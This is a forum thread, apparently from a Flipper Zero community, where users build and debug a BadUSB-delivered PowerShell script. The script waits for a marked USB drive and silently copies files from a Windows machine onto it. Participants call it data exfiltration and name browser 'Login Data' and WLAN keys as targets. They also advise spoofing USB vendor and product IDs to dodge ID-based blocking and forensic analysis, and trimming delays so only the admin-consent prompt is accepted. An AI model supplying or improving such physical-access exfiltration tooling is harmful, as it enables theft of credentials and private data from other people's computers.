Anyway to save files back to the Flipper using BadUSB?

LupusE · July 6, 2023, 6:37am

I’ve tried today on a test system.

The coding doesn’t work in my region. I suggest too replace STRING with ALTSTRING.
~~2. But even if the encoding is fixed, the Test-Path could never gets a $true~~

~~I remember darkly there was a issue with Test-Path and removeable devices, but I cannot remember the details.~~

My debugging code so far:

$CopyFrom = "C:\Windows\System32\calc.exe"; $CopyTo = "copy"
$FindMe = "gfhnubkw.txt"; $f = $false
While (-not $f) {
    Foreach ($USBDrive in (Get-WmiObject -Class Win32_Volume -Filter {DriveType=2}).Name) {
        If (Test-Path (Join-Path -Path $USBDrive -ChildPath $FindMe)) {
            $f = $true; Write-Host "Copying... $(((Get-ChildItem $CopyFrom | Measure-Object -Sum Length).Sum)/1MB) MB to $USBDrive, where $(((Get-Volume -DriveLetter $USBDrive.Substring(0,1)).SizeRemaining)/1MB) MB are remaining"
            Copy-Item -Path $CopyFrom -Destination $USBDrive\$CopyTo -Recurse -ErrorAction SilentlyContinue } #;Exit }
    Continue }} #Exit

Is my Win10 (Up to date) the only one, which does not work?
(Join-Path -Path $USBDrive -ChildPath $FindMe) gives the correct result, but the If is always $false. If I perform this on a harddrive by changing the variables, it works.
Also with Test-Path instead of [System.IO.File]::Exists(), I just playes with other know functions.

Edit: Make Code more compact.

LupusE · July 6, 2023, 11:43am

Okay, this is some kind of embasassing … It is a fresh windows, so the file extensions where hidden. The script can’t find gfhnubkw.txt.txt …

It works.

I was more interested in WLAN keys and user data. Even “%localappdata%\Microsoft\Edge\User Data\Default\Login Data” is only a few kb in size.

But it seems that ‘large data exfiltration’ is a point of interest.
In your example, @Zarcolio, you’re selecting C:\Windows\ and copy this to a USB drive. My fresh C\Windows\ is nearly 30GB … my Test-USB Drive 8GB.

I extended the Write-Host Line:
Write-Host "Copying... $(((Get-ChildItem $CopyFrom | Measure-Object -Sum Length).Sum)/1MB) MB to $e, where $(((Get-Volume -DriveLetter $e).SizeRemaining)/1MB) MB are remaining"
Maybe it is useful to check if the remaining space is enough.

In my tests I wanted to copy a file. The Copy-Item CMDlet writes calc.exe to E:\copy … Maybe some New-Item -ItemType Directory -Force -Path e$\$copy (short md e$\$copy) would help?
No time to test, today. I would not have answered, If my previous post wasn’t so wrong.

Zarcolio · July 6, 2023, 9:01pm

Been a really long day, no access to personal device today.
Will try tomorrow to have a look.
Maybe better to use ALTSTRING always if some regions have difficulties with STRING.
Will have a look at your code

Zarcolio · July 6, 2023, 9:05pm

No worries, stuff happens

C:\Windows was only a test to check if it starts.
You can change to whatever you like.

Will have a look tomorrow, hopefully

LupusE · July 7, 2023, 3:29pm

I understand, you’d want to have a look at ot first. But the file to $CopyTo issue bugs me.
I’ve added If (Test-Path -Path $CopyFrom -PathType Leaf) {md $USBDrive\$CopyTo} before the Copy-Item CMDlet. Else C:\Windows\* would be copied to E:\copy\* (let’s say renamed at the target) … this is okay for me.
md is very short für New-Object -Blah Directory blah blah blah. Standard PS function, so I use it.

Zarcolio · July 8, 2023, 6:20am

Why would you make this script run (slightly) longer when you can prepare the USB drive before using it?

LupusE · July 8, 2023, 6:28am

Good point. If the script won’t check for the file, instead for the path, it would be 2 in one.

Zarcolio · July 17, 2023, 2:26pm

Changed the script a bit:

It uses ALTSTRING
It quits after $MaxDuration
It shows total MB/GB to be copied

Thanks for the input

jethr0 · September 1, 2023, 1:32am

I know it’s been a little while since this topic was active, but looking into it now this seems like a super promising method to get some kind of exfiltration via storage functionality. I want to test this script once I’m home and have access to the Flipper but I’m wondering if I would need to change the -match ‘HID/USB’ values if not all Flipper’s have the same IDs. If they do, how would I find mine? Still relatively new to powershell hahaha, not quite accustomed to how things are done on Windows

LupusE · September 1, 2023, 4:56am

To change the ID is a feature from BadUSB, so this is set at the beginning of the BadUSB file.
Since the PowerShell is searching for the ID it needs to be changed there, too.

But if you are new to this, it is really not important to understand the basics. Just start with ‘as is’.
If you chose the wrong ID, windows will try to install a driver and map the Flippers BadUSB… It is only necessary as attack vector, if:
A. You know the computer/network has a ID based blocking rule.
b. You want to go stealth in later forensic analysis … But than you should know what IDs are used in this environment.

jethr0 · September 1, 2023, 8:08am

Great, thank you. I’ve attempted to test the script (both your version here and emptythevoid’s version on GitHub) and can’t seem to get any success. It runs the PowerShell code just fine and will return ‘BadUSB’ when I’m still in BadUSB mode, but when exiting out to the list of apps it just displays ‘NoFZ’ and nothing is written. I haven’t changed any ID’s in the BadUSB script, and as far as Windows is telling me the COM device has the same VID and PID as is in the script. Is there any reason you can think of as to why it might not work? I have a custom firmware installed but it hasn’t affected qFlipper’s serial connection nor any kind of BadUSB connectivity.

LupusE · September 1, 2023, 11:13am

The script could not work, if qFlipper, the web client or another app is getting the COM first and blocking the port.
There is no spezial debug output for this situation, but noFZ sounds reasonable.

To check close all apps (mainly qFlipper and Browser).

jethr0 · September 2, 2023, 3:30am

Ahh yes that makes sense, that was the issue. It seems to work well now, my only concern is the amount of time it takes to write out the one-liner, might look into some way I can speed it up. Thanks very much for your help, always wanted a way to locally exfiltrate data

LupusE · September 2, 2023, 7:45am

Good to hear it worked.

I already tried to fasten the process, but getting the input faster lead to wrong inputs (repeating or missing character). So in the end a reliable input was more important for me.

But if you get it faster, we all would be interested in the results

Btw: If I remember right, the result is the same, but not very accurate written from me.
If a client, like qFlipper, acquiring the Flipper, it does not block the port, the flipper is switching in another mode. So maybe the VID/PID is there and open aber can’t be used … This can be important while write checks or debug.

jethr0 · September 2, 2023, 12:14pm

I managed to get it slightly faster by removing all delays except for accepting the “making changes to your computer” dialogue. I’m not sure if it’s the case with every device but my PowerShell seems to accept input for new commands even as previous commands are running, which means I’m able to exit BadUSB mode way before the target computer even gets to running the loop checking for serial connection.

HereIam · October 7, 2023, 2:34pm

Partitioning the storage prior?

Caribou · February 27, 2024, 2:21am

I know this is a little old and my knowledge in the subject is limited, but I noticed the baud rate in the script is set at 115200, but on the flipper CLI docs they’ve suggested using a baud rate of 230400. I’m not sure if this will have any impacts, but it’s an adjustment I made in my script.